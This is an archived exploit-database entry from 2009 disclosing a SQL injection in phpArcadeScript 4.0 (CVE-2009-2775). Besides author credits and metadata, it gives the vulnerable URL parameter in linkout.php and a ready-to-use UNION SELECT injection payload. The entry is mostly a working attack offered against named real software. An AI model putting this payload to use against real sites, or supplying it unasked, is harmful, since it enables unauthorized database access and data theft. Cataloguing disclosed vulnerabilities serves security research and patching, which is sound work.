[] NeoSense

phpArcadeScript 4.0 - 'id' SQL Injection

Author: MizoZ
type: webapps
platform: php
port: 
date_added: 2009-07-27 
date_updated: 2016-11-15 
verified: 1 
codes: OSVDB-57130;CVE-2009-2775 
tags: 
aliases:  
screenshot_url:  
application_url: 

----------------------------------------------------------------------------------------------------
  Name : PHP AS v4
  Site : http://www.phparcadescript.com/

----------------------------------------------------------------------------------------------------

  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , JIKO , opt!x , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection linkout.php (GET : id) :
[HOST]/[PATH]/linkout.php?id=[SQL CODE]

SQL CODE : null+union+select+1,2,3,4,5,6,7,8,9,10,11--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-28]